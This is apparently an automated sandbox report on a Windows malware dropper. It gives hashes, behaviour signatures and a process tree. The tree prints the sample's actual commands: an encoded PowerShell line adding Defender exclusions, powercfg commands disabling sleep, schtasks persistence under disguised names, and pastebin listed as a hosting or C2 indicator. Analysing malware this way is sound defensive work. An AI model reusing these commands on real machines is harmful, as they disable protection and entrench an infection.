Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
13/07/2024, 21:06
Static task
static1
Behavioral task
behavioral1
Sample
f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral2
Sample
f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe
Resource
win11-20240709-en
General
-
Target
f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe
-
Size
2.5MB
-
MD5
eb51e8cbb840ace72c5a42d3e0ce2765
-
SHA1
965d2300cb9627f6605a269dae2f5bc2d7eeeada
-
SHA256
f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b
-
SHA512
a578dcc069d55770d24c60aa3540680489ba44a0b4620a742a46fb9ad3085e316914750f15140170cb6fbdff35fec52b83d837d7f34ed9f2562f97214df7490d
-
SSDEEP
49152:uA5JkHDjz4jI+7tjygzaQBrGpvEOB5fB8ra0bNSzee+h6bLeT1Rh77bRKwzWw:uA5Ojvd+7tpzaIML5cNnjT9R+w
Malware Config
Signatures
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe -
Executes dropped EXE 4 IoCs
pid Process 2272 7z.exe 3484 7z.exe 1584 7z.exe 5116 Installer.exe -
Loads dropped DLL 3 IoCs
pid Process 2272 7z.exe 3484 7z.exe 1584 7z.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 14 pastebin.com 15 pastebin.com -
Power Settings 1 TTPs 1 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 752 cmd.exe -
pid Process 808 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 772 schtasks.exe 3440 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 5116 Installer.exe 808 powershell.exe 808 powershell.exe 5116 Installer.exe 5116 Installer.exe 5116 Installer.exe 5116 Installer.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeRestorePrivilege 2272 7z.exe Token: 35 2272 7z.exe Token: SeSecurityPrivilege 2272 7z.exe Token: SeSecurityPrivilege 2272 7z.exe Token: SeRestorePrivilege 3484 7z.exe Token: 35 3484 7z.exe Token: SeSecurityPrivilege 3484 7z.exe Token: SeSecurityPrivilege 3484 7z.exe Token: SeRestorePrivilege 1584 7z.exe Token: 35 1584 7z.exe Token: SeSecurityPrivilege 1584 7z.exe Token: SeSecurityPrivilege 1584 7z.exe Token: SeDebugPrivilege 5116 Installer.exe Token: SeDebugPrivilege 808 powershell.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 4876 wrote to memory of 948 4876 f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe 86 PID 4876 wrote to memory of 948 4876 f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe 86 PID 948 wrote to memory of 1776 948 cmd.exe 88 PID 948 wrote to memory of 1776 948 cmd.exe 88 PID 948 wrote to memory of 2272 948 cmd.exe 89 PID 948 wrote to memory of 2272 948 cmd.exe 89 PID 948 wrote to memory of 3484 948 cmd.exe 90 PID 948 wrote to memory of 3484 948 cmd.exe 90 PID 948 wrote to memory of 1584 948 cmd.exe 91 PID 948 wrote to memory of 1584 948 cmd.exe 91 PID 948 wrote to memory of 100 948 cmd.exe 92 PID 948 wrote to memory of 100 948 cmd.exe 92 PID 948 wrote to memory of 5116 948 cmd.exe 93 PID 948 wrote to memory of 5116 948 cmd.exe 93 PID 948 wrote to memory of 5116 948 cmd.exe 93 PID 5116 wrote to memory of 752 5116 Installer.exe 95 PID 5116 wrote to memory of 752 5116 Installer.exe 95 PID 5116 wrote to memory of 752 5116 Installer.exe 95 PID 752 wrote to memory of 808 752 cmd.exe 97 PID 752 wrote to memory of 808 752 cmd.exe 97 PID 752 wrote to memory of 808 752 cmd.exe 97 PID 5116 wrote to memory of 1468 5116 Installer.exe 98 PID 5116 wrote to memory of 1468 5116 Installer.exe 98 PID 5116 wrote to memory of 1468 5116 Installer.exe 98 PID 5116 wrote to memory of 1940 5116 Installer.exe 99 PID 5116 wrote to memory of 1940 5116 Installer.exe 99 PID 5116 wrote to memory of 1940 5116 Installer.exe 99 PID 1468 wrote to memory of 772 1468 cmd.exe 102 PID 1468 wrote to memory of 772 1468 cmd.exe 102 PID 1468 wrote to memory of 772 1468 cmd.exe 102 PID 1940 wrote to memory of 3440 1940 cmd.exe 103 PID 1940 wrote to memory of 3440 1940 cmd.exe 103 PID 1940 wrote to memory of 3440 1940 cmd.exe 103 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 100 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe"C:\Users\Admin\AppData\Local\Temp\f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"2⤵
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\system32\mode.commode 65,103⤵PID:1776
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p2201249071693326612168609430 -oextracted3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2272
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3484
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
C:\Windows\system32\attrib.exeattrib +H "Installer.exe"3⤵
- Views/modifies file attributes
PID:100
-
-
C:\Users\Admin\AppData\Local\Temp\main\Installer.exe"Installer.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAEgARwB1AFMAQwBqAEsAcwB1ADkAQwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQATQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAMQA5AGIAdQAzAGwASwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAyAE8AIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off4⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAEgARwB1AFMAQwBqAEsAcwB1ADkAQwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQATQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAMQA5AGIAdQAzAGwASwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAyAE8AIwA+AA=="5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:808
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:772
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5834" /TR "C:\ProgramData\Dllhost\dllhost.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5834" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:3440
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
2.2MB
MD563f1b9d1a36038c8098b5a37efb92741
SHA1809f30eede4cc79e65531cb853d2b945d021b8bd
SHA2568f845fb3f73ab9364451d57a7848c2f9085c953f05277309021b094c162d9e8e
SHA512aaf221581eba802799cdb1e46bd7ba477e330058831080701653815f71b07e735d7d46fc13334f94bb5a2626348078e6db4f813e9c544f63b05ec4b2fdb4e1a7
-
Filesize
21KB
MD5d6eea09bf480e7e8fbbf58b13e124cb5
SHA18ad1a6ef15dd14f09c4d1b376ca17ca05823ed5e
SHA25600e1f6aa291ae8157b7b54b6dc42b3fdb08bac0ce25cd6af8614ba360c0b07b6
SHA512f3adae262a0d8446be322c4655f79af9ed1705c36caec066178d8e2cbacb89f39cdccfaebaad1958f2f76e0980e43c18d489e6cd2a7bcc80a49dffee9f2e7717
-
Filesize
9KB
MD59167575a83ebb373a7b0b38fc2bbefac
SHA189473d9b619851d72be027e3290357104b9afdb2
SHA256dce14b29a6ee1b217c10ff6d9627e5c5f41cfa754ae75e7d31546525510a2ce0
SHA512105cad3ac67178fa896b37b0254aadb28d50d4b45ea65d01358b557be09cdcefb75a30f5397e3d07876607b754cdc242a880db91abd872a12d565c41808c0911
-
Filesize
1.6MB
MD5523621a94c9b7ea466517f725b00e2e7
SHA13d070c2d26a3b0f122cf4ae2b59b00c6a539b13a
SHA2563e8daa43074379bf00c81870c27a8e8faf4004452a10a78d0610f49035109907
SHA51211138df7d8bd1d31af2e5f5bc06c7a75ae2b33d2dce663a8e522f121be3dbc27abaa25289154c219bb52ed35ac5b4bcf1125e5f7071253fd9e06af72e573a61d
-
Filesize
1.6MB
MD5a06f952cc7b13c41b98d4466eaa0e9d2
SHA18637be26c64ed09987c6dd924626b8a4c38c4727
SHA2560b0d8cba1c09dff1977fcfd6b5042e83da702f022322e5b2adf757d33a9ee452
SHA512f18a5bfa13831f6b1a91cacbb1fa7b37277ae20af824f465dade43c5620690e5ffbcddd34a98569fee187fe517107ccb4dc1bd38386b8cab3f01818df2c95b41
-
Filesize
474B
MD526b8a6174f1a14c05bbf5e0cfc12ccbf
SHA1de66142a9bf6b22cd7511e2c9b0c01edafbd7409
SHA2560880304b10189062193d90d0de8ebfc26a3c1c4962bcee002ca5889dad64797d
SHA512f758f721bf459858bd614acfe74db97ee399a02a789d3c6faf94c29a5db96e429cfefab3cdbbffabadc3ede98f0af94bf551bd5262eebddb2190151524584506